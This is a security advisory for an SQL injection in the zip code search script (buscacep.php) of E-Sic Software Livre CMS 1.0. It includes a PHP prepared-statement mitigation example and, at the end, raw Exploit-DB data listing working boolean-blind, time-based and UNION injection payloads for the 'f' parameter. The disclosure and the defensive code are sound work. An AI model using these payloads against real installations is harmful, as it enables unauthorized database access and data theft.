Vendor: E-Sic Software Livre CMS
By: Elber Tavares
CVSS: 7,5 (HIGH)
SQL Injection
CWE: 89
Product Name: E-Sic Software Livre CMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:software_publico:e-sic_software_livre_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Kali Linux, Windows 7, 8.1, 10 - Firefox
2017

E-Sic Software Livre CMS – SQL Injection

The vulnerability is in the zip code search script. An attacker can exploit it by sending malicious payloads in the 'f' parameter of the 'buscacep.php' script. The payloads can be boolean-based blind, AND/OR time-based blind, or UNION query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
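An added example (not code from E-Sic or from the advisory author) of this mitigation for a zip code lookup like 'buscacep.php': the 'f' value is checked against the CEP format and then bound as a parameter in a prepared statement instead of being concatenated into the query. The table and column names, the function names, and the in-memory SQLite database standing in for the application's MySQL backend are assumptions.

```php
<?php
// Added example: hypothetical hardened lookup for a CEP (zip code) search.
// Table, column and function names are assumptions, not E-Sic code.
declare(strict_types=1);

/** Normalise a CEP to 8 digits, or return null if the input is not a CEP. */
function normalize_cep(string $raw): ?string
{
    // Accept "70040-020" or "70040020"; reject everything else.
    if (preg_match('/\A(\d{5})-?(\d{3})\z/', trim($raw), $m) !== 1) {
        return null;
    }
    return $m[1] . $m[2];
}

/** Look up an address; the value is bound, never concatenated into SQL. */
function lookup_cep(PDO $db, string $raw): ?array
{
    $cep = normalize_cep($raw);
    if ($cep === null) {
        return null; // invalid input never reaches the database
    }
    $stmt = $db->prepare('SELECT cep, street, city FROM cep_lookup WHERE cep = :cep');
    $stmt->execute([':cep' => $cep]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database (stand-in for MySQL).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cep_lookup (cep TEXT PRIMARY KEY, street TEXT, city TEXT)');
$db->exec("INSERT INTO cep_lookup VALUES ('70040020', 'Constructed Street', 'Brasilia')");

// One valid CEP, then the boolean-based and time-based values listed in the advisory.
$inputs = [
    '70040-020',
    "-1932' OR 5987=5987 AND 'dtev'='dtev",
    "test' OR SLEEP(5) AND 'kucr'='kucr",
];
foreach ($inputs as $f) {
    $row = lookup_cep($db, $f);
    printf("%-45s => %s\n", $f, $row ? $row['street'] : 'rejected / no match');
}
```

Only the first input returns a row; the other two fail the format check, and even without that check the bound parameter would be compared as a literal string rather than parsed as SQL.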

Exploit-DB raw data:

# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download
https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More information:

http://whiteboyz.xyz/esic-software-publico-sql-injection.html

Vulnerability is in the zip code search script
---------------------------------------------------------------------

Url: http://localhost/esiclivre/restrito/inc/buscacep.php


DATA:

Parameter: f (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: f=-1932' OR 5987=5987 AND 'dtev'='dtev

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: f=test' OR SLEEP(5) AND 'kucr'='kucr

    Type: UNION query
    Title: MySQL UNION query (random number) - 6 columns
    Payload: f=test' UNION ALL SELECT 3344,3344,CONCAT(0x7162627a71,0x54657946565941494562654c437570647a4f4e53616744546e526663454152424e71506e564d6853,0x71786a6a71),3344,3344,3344#